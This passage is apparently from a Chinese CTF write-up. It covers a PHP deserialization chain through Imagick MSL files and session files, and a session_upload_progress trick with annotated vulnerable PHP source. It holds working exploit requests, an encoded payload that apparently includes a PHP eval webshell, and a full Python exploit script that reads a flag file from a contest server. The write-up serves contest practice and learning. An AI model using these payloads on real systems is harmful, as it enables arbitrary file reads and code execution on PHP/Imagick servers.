class="language-xml">UDYKOSA5CjI1NQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="language-xml">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="language-xml">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw/cGhwIGV2YWwoJF9HRVRb</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="language-xml">MV0pOz8+fE86MTM6ImZ1bW9fYmFja2Rvb3IiOjQ6e3M6NDoicGF0aCI7czo4OiIvdG1wL3NzcyI7</span></span></span><br><span class="hljs-string"><span class="hljs-tag"><span class="language-xml">czo0OiJhcmd2IjtOO3M6NDoiZnVuYyI7TjtzOjU6ImNsYXNzIjtOO30K&quot;</span> /&gt;</span></span><br><span class="language-xml"></span><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;/tmp/sess_se&quot;</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span></span><span class="language-xml"></span><br><span class="language-xml">--------------------------c32aaddf3d8fd979</span><br></code></pre></td></tr></table></figure>



<p>第一个请求包在反序列化进行了<code>imagick</code>类初始化。同时传输XML文档，写入文件sess_se，这样在session_start的时候cookie设置为PHPSESSID&#x3D;se的时候就可以直接读取该文件内容进行反序列化进入readfile。</p>
<p>接着构造第二个请求包把flag读到tmp的sess_s4mmy文件中，用于后续反序列化的包含</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span> ?&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">image</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;mvg:/flag&quot;</span> /&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;/tmp/sss&quot;</span> /&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>所以总共是有两个临时文件一个是用于session反序列化，另一个是用于写入flag，并在反序列化的时候包含输出。</p>
<p>一开始没理清这个逻辑，我饶了好久😭😭😭</p>
<p>第二个请求包</p>
<figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs xquery">POST /?data=O:<span class="hljs-number">13</span>:<span class="hljs-meta">%22fumo_backdoor</span><span class="hljs-meta">%22:4:</span><span class="hljs-meta">%7Bs:4:</span><span class="hljs-meta">%22path</span><span class="hljs-meta">%22</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-meta">%22argv</span><span class="hljs-meta">%22</span>;s:<span class="hljs-number">17</span>:<span class="hljs-meta">%22vid:msl:</span>/tmp/php*<span class="hljs-meta">%22</span>;s:<span class="hljs-number">4</span>:<span class="hljs-meta">%22func</span><span class="hljs-meta">%22</span>;N;s:<span class="hljs-number">5</span>:<span class="hljs-meta">%22class</span><span class="hljs-meta">%22</span>;s:<span class="hljs-number">7</span>:<span class="hljs-meta">%22imagick</span><span class="hljs-meta">%22</span>;<span class="hljs-meta">%7D</span>&amp;cmd=unserialze HTTP/<span class="hljs-number">1.1</span><br>HOST: <span class="hljs-number">182.92</span>.<span class="hljs-number">6.230</span>:<span class="hljs-number">18080</span><br>Accept:*/*<br>Content-Type: multipart/form-data; boundary=------------------------c32aaddf3d8fd979<br><br>--------------------------c32aaddf3d8fd979<br>Content-Disposition: form-data;<span class="hljs-built_in"> name</span>=<span class="hljs-string">&quot;swarm&quot;</span>; filename=<span class="hljs-string">&quot;swarm.msl&quot;</span><br>Content-Type: application/octet-stream<br><br>&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span> ?&gt;<br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">image</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;mvg:/flag&quot;</span> /&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;/tmp/sss&quot;</span> /&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span></span><br>------------------------c32aaddf3d8fd979<br></code></pre></td></tr></table></figure>

<p>最后再携带PHPSESSID&#x3D;se去同时执行session_start()触发<code>__sleep</code>包含flag文件</p>
<p>这里我自己手动试了两天都不能出flag，但是网上的一个脚本能把flag跑出来，还是研究一下脚本吧😭😭😭太难了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests, base64, time<br>SERVER_ADDR = <span class="hljs-string">&quot;http://182.92.6.230:18080/&quot;</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">del_tempd</span>() -&gt; <span class="hljs-literal">None</span>:<br>    resp = requests.post(SERVER_ADDR, data=&#123;<span class="hljs-string">&quot;cmd&quot;</span>:<span class="hljs-string">&quot;rm&quot;</span>,&#125;)<br>    <span class="hljs-built_in">print</span>(resp.status_code)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">write_file</span>(<span class="hljs-params">xml: <span class="hljs-built_in">str</span></span>):<br>    <span class="hljs-comment"># Imagick(&quot;vid:msl:/tmp/php*&quot;)</span><br>    unserialize = base64.b64decode(<span class="hljs-string">b&#x27;TzoxMzoiZnVtb19iYWNrZG9vciI6NDp7czo0OiJwYXRoIjtOO3M6NDoiYXJndiI7YToxOntpOjA7czoxNzoidmlkOm1zbDovdG1wL3BocCoiO31zOjQ6ImZ1bmMiO047czo1OiJjbGFzcyI7czo3OiJJbWFnaWNrIjt9&#x27;</span>)<br>    resp = requests.post(SERVER_ADDR,files=&#123;<span class="hljs-string">&quot;file&quot;</span>:(<span class="hljs-string">&quot;exec1.msl&quot;</span>,xml)&#125;,data=&#123;<span class="hljs-string">&quot;cmd&quot;</span>:<span class="hljs-string">&quot;unserialze&quot;</span>,<span class="hljs-string">&quot;data&quot;</span>:unserialize&#125;)<br>    <span class="hljs-built_in">print</span>(resp.status_code)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">show_phpinfo</span>() -&gt; <span class="hljs-literal">None</span>:<br>    <span class="hljs-built_in">print</span>(SERVER_ADDR + <span class="hljs-string">&quot;?cmd=unserialze&amp;data=O%3A13%3A%22fumo_backdoor%22%3A4%3A%7Bs%3A4%3A%22path%22%3BN%3Bs%3A4%3A%22argv%22%3Bs%3A14%3A%22vid%3Amsl%3A%2Ftmp%2Fa%22%3Bs%3A4%3A%22func%22%3Bs%3A7%3A%22phpinfo%22%3Bs%3A5%3A%22class%22%3Bs%3A7%3A%22Imagick%22%3B%7D&quot;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">get_new_php_session</span>() -&gt; <span class="hljs-built_in">str</span>:<br>    resp = requests.get(SERVER_ADDR + <span class="hljs-string">&quot;?cmd=unserialze&amp;data=O%3A13%3A%22fumo_backdoor%22%3A4%3A%7Bs%3A4%3A%22path%22%3BN%3Bs%3A4%3A%22argv%22%3Bs%3A14%3A%22vid%3Amsl%3A%2Ftmp%2Fa%22%3Bs%3A4%3A%22func%22%3Bs%3A13%3A%22session_start%22%3Bs%3A5%3A%22class%22%3Bs%3A7%3A%22Imagick%22%3B%7D&quot;</span>)<br>    <span class="hljs-keyword">return</span> resp.headers.get(<span class="hljs-string">&quot;Set-Cookie&quot;</span>)[<span class="hljs-number">10</span>:<span class="hljs-number">42</span>]<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">session_start</span>(<span class="hljs-params">session_id: <span class="hljs-built_in">str</span></span>) -&gt; <span class="hljs-literal">None</span>:<br>    resp = requests.get(SERVER_ADDR + <span class="hljs-string">&quot;?cmd=unserialze&amp;data=O%3A13%3A%22fumo_backdoor%22%3A2%3A%7Bs%3A4%3A%22path%22%3Bs%3A8%3A%22%2Ftmp%2Fyyz%22%3Bs%3A4%3A%22func%22%3Bs%3A13%3A%22session_start%22%3B%7D&quot;</span>, cookies=&#123;<span class="hljs-string">&quot;PHPSESSID&quot;</span>: session_id&#125;)<br>    <span class="hljs-built_in">print</span>(resp.text)<br><br>del_tempd()<br>time.sleep(<span class="hljs-number">2</span>)<br><br>session_id = get_new_php_session()<br><span class="hljs-built_in">print</span>(session_id)<br>time.sleep(<span class="hljs-number">2</span>)<br><br>del_tempd()<br>time.sleep(<span class="hljs-number">2</span>)<br><br>xml = <span class="hljs-string">f&#x27;&#x27;&#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="hljs-string">&lt;group&gt;</span><br><span class="hljs-string">&lt;image &gt;</span><br><span class="hljs-string"> &lt;read filename=&quot;mvg:/flag[20x20+20+20]&quot;/&gt;</span><br><span class="hljs-string">&lt;/image&gt;</span><br><span class="hljs-string">&lt;write filename=&quot;mvg:/tmp/yyz&quot;/&gt;</span><br><span class="hljs-string">&lt;/group&gt;</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br>xml2 = <span class="hljs-string">f&#x27;&#x27;&#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;</span><br><span class="hljs-string">&lt;group&gt;</span><br><span class="hljs-string">&lt;image &gt;</span><br><span class="hljs-string">&lt;read filename=&quot;inline:data:text/8BIM;base64,eXl6fE86MTM6ImZ1bW9fYmFja2Rvb3IiOjI6e3M6NDoicGF0aCI7czo4OiIvdG1wL3l5eiI7czo0OiJmdW5jIjtzOjEzOiJzZXNzaW9uX3N0YXJ0Ijt9&quot;/&gt;</span><br><span class="hljs-string">&lt;/image&gt;</span><br><span class="hljs-string">&lt;write filename=&quot;8BIM:/tmp/sess_<span class="hljs-subst">&#123;session_id&#125;</span>&quot;/&gt;</span><br><span class="hljs-string">&lt;/group&gt;</span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br>write_file(xml)<br>time.sleep(<span class="hljs-number">3</span>)<br><br>write_file(xml2)<br>time.sleep(<span class="hljs-number">3</span>)<br><br>session_start(session_id)<br></code></pre></td></tr></table></figure>

<p>这个脚本一共有五个功能，分别是写文件（xml），删除文件（即cmd&#x3D;rm），获取一个新的session（session_start），session_start（即触发_sleep的最后一步），展示phpinfo界面。</p>
<p>按照脚本的步骤来，第一步是清除临时文件，然后生成一个新的session</p>
<p>此时反序列化数据如下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;fumo_backdoor&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;path&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;argv&quot;</span>;s:<span class="hljs-number">14</span>:<span class="hljs-string">&quot;vid:msl:/tmp/a&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;func&quot;</span>;s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;session_start&quot;</span>;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;class&quot;</span>;s:<span class="hljs-number">7</span>:<span class="hljs-string">&quot;Imagick&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>然后输出获得的session</p>
<p>再次清除临时文件</p>
<p>开始写入xml文档，第一次写入的文档内容如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">group</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">image</span> &gt;</span><br> <span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;mvg:/flag[20x20+20+20]&quot;</span>/&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;mvg:/tmp/yyz&quot;</span>/&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">group</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>反序列化内容如下</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">O:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;fumo_backdoor&quot;</span>:<span class="hljs-number">4</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;path&quot;</span>;N;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;argv&quot;</span>;<span class="hljs-selector-tag">a</span>:<span class="hljs-number">1</span>:&#123;<span class="hljs-selector-tag">i</span>:<span class="hljs-number">0</span>;s:<span class="hljs-number">17</span>:<span class="hljs-string">&quot;vid:msl:/tmp/php*&quot;</span>;&#125;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;func&quot;</span>;N;s:<span class="hljs-number">5</span>:<span class="hljs-string">&quot;class&quot;</span>;s:<span class="hljs-number">7</span>:<span class="hljs-string">&quot;Imagick&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>第二次写入内容如下</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-meta">&lt;?xml version=<span class="hljs-string">&quot;1.0&quot;</span> encoding=<span class="hljs-string">&quot;UTF-8&quot;</span>?&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">group</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">image</span> &gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">read</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;inline:data:text/8BIM;base64,eXl6fE86MTM6ImZ1bW9fYmFja2Rvb3IiOjI6e3M6NDoicGF0aCI7czo4OiIvdG1wL3l5eiI7czo0OiJmdW5jIjtzOjEzOiJzZXNzaW9uX3N0YXJ0Ijt9&quot;</span>/&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">image</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">write</span> <span class="hljs-attr">filename</span>=<span class="hljs-string">&quot;8BIM:/tmp/sess_&#123;session_id&#125;&quot;</span>/&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">group</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>反序列化内容如下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">yyz</span>|O:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;fumo_backdoor&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;path&quot;</span>;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;/tmp/yyz&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;func&quot;</span>;s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;session_start&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>最后是带出flag，反序列化内容如下</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">O</span>:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;fumo_backdoor&quot;</span>:<span class="hljs-number">2</span>:&#123;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;path&quot;</span>;s:<span class="hljs-number">8</span>:<span class="hljs-string">&quot;/tmp/yyz&quot;</span>;s:<span class="hljs-number">4</span>:<span class="hljs-string">&quot;func&quot;</span>;s:<span class="hljs-number">13</span>:<span class="hljs-string">&quot;session_start&quot;</span>;&#125;<br></code></pre></td></tr></table></figure>

<p>可能是手工构造存在什么小细节不好把握吧，太难搞了，以后有这种题目还是尽量通过脚本来接提拔。。。太难受了，这题总共做了三天差不多😭😭😭</p>
<h3 id="pypyp？"><a href="#pypyp？" class="headerlink" title="pypyp？"></a>pypyp？</h3><p>又是很坑爹的一题😭😭😭，前前后后一共做了四天差不多。不过也学到了许多知识</p>
<p>一进入页面提示session not started，题目提示&#x2F;app&#x2F;app.py，访问看看</p>
<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230218997.png" srcset="/img/loading.gif" lazyload alt="image-20230713002110951"></p>
<p>似乎不能直接利用。。。到这里就没啥思路了</p>
<p>最后上网查了一下WP才知道这里的考点是PHP的<code>session_upload_progress</code>强制生成session，因为题目提示里有个app.py,我就以为网站都是用python编写的。这里是我思维局限了，没去Wappalyzer看一下这个网站用的是什么语言。其实在这个session页面用的是PHP编写。</p>
<p><code>session_upload_progress</code>是个老考点了，不过太久没做题我就把这个知识点给忘了😓</p>
<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230218992.png" srcset="/img/loading.gif" lazyload alt="image-20230713001809914"></p>
<p>因为直接发送请求包并不会在服务器上创建会话，所以在这里利用<code>session_upload_progress</code>的特点来从服务器上强制创建一个session，使用如下脚本来构造一个上传文件与请求进度同时存在的文件</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-meta">&lt;!doctype <span class="hljs-keyword">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;<span class="hljs-name">form</span> <span class="hljs-attr">action</span>=<span class="hljs-string">&quot;http://115.239.215.75:8081/index.php&quot;</span> <span class="hljs-attr">method</span>=<span class="hljs-string">&quot;POST&quot;</span> <span class="hljs-attr">enctype</span>=<span class="hljs-string">&quot;multipart/form-data&quot;</span>&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;hidden&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;</span> <span class="hljs-attr">value</span>=<span class="hljs-string">&quot;123&quot;</span> /&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;file&quot;</span> <span class="hljs-attr">name</span>=<span class="hljs-string">&quot;file&quot;</span> /&gt;</span><br>    <span class="hljs-tag">&lt;<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">&quot;submit&quot;</span> /&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">form</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">body</span>&gt;</span><br><span class="hljs-tag">&lt;/<span class="hljs-name">html</span>&gt;</span><br></code></pre></td></tr></table></figure>

<p>这里要抓包在请求包中添加<code>Cookie: PHPSESSID</code>才可以</p>
<p><img src="https://gitee.com/shark-rice/images/raw/master/202307230218663.png" srcset="/img/loading.gif" lazyload alt="image-20230713162129739"></p>
<p>过去之后获得源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SESSION</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;Session not started&#x27;</span>);<br>    &#125;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    <span class="hljs-variable">$type</span> = <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;type&#x27;</span>];<br>    <span class="hljs-variable">$properties</span> = <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;properties&#x27;</span>];<br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;data&#x27;</span>]);<br>    <span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;data&#x27;</span>]));<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$properties</span>)&amp;&amp;<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$properties</span>)))&#123;<br>    <span class="hljs-variable">$object</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$properties</span>));<br>    <span class="hljs-variable">$object</span> -&gt; <span class="hljs-title function_ invoke__">sctf</span>();<br>    <span class="hljs-keyword">exit</span>();<br>    &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$properties</span>))&#123;<br>        <span class="hljs-variable">$object</span> = <span class="hljs-keyword">new</span> <span class="hljs-variable">$type</span>(<span class="hljs-variable">$properties</span>[<span class="hljs-number">0</span>],<span class="hljs-variable">$properties</span>[<span class="hljs-number">1</span>]);<br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-variable">$object</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;http://127.0.0.1:5000/&#x27;</span>.<span class="hljs-variable">$properties</span>);<br>    &#125;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;this is the object: <span class="hljs-subst">$object</span> &lt;br&gt;&quot;</span>;<br><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>看起来有点复杂，一行一行看下去</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>    <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br>    <span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_SESSION</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;Session not started&#x27;</span>);<br>    &#125;<br><span class="hljs-comment">//判断是否有session，若无则直接退出</span><br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>    <span class="hljs-variable">$type</span> = <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;type&#x27;</span>];<br>    <span class="hljs-variable">$properties</span> = <span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;properties&#x27;</span>];<br><span class="hljs-comment">//在session读取两个属性的值并赋值</span><br>    <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;data&#x27;</span>]);<br><span class="hljs-comment">//可控数据data</span><br>    <span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;data&#x27;</span>]));<br><span class="hljs-comment">//对data进行反序列化。extract，可以将数组中的键值对转换为变量和对应的值，可以利用此函数进行变量覆盖</span><br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$properties</span>)&amp;&amp;<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$properties</span>)))&#123;<br><span class="hljs-comment">//判断，若properties为字符串且能反序列化，则进入如下判断</span><br>    <span class="hljs-variable">$object</span> = <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-title function_ invoke__">urldecode</span>(<span class="hljs-variable">$properties</span>));<br><span class="hljs-comment">//将object设置为properties的反序列化对象</span><br>    <span class="hljs-variable">$object</span> -&gt; <span class="hljs-title function_ invoke__">sctf</span>();<br><span class="hljs-comment">//调用sctf()方法</span><br>    <span class="hljs-keyword">exit</span>();<br>    &#125; <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$properties</span>))&#123;<br>        <span class="hljs-variable">$object</span> = <span class="hljs-keyword">new</span> <span class="hljs-variable">$type</span>(<span class="hljs-variable">$properties</span>[<span class="hljs-number">0</span>],<span class="hljs-variable">$properties</span>[<span class="hljs-number">1</span>]);<br><span class="hljs-comment">//若properties方法是数组，则把type当做类名，properties的前两个值当做参数实例化一个类</span><br>    &#125; <span class="hljs-keyword">else</span> &#123;<br>        <span class="hljs-variable">$object</span> = <span class="hljs-title function_ invoke__">file_get_contents</span>(<span class="hljs-string">&#x27;http://127.0.0.1:5000/&#x27;</span>.<span class="hljs-variable">$properties</span>);<br><span class="hljs-comment">//通过内网读取文件，其中文件由properties的值决定</span><br>    &#125;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;this is the object: <span class="hljs-subst">$object</span> &lt;br&gt;&quot;</span>;<br><span class="hljs-comment">//最后会由echo输出object内容</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

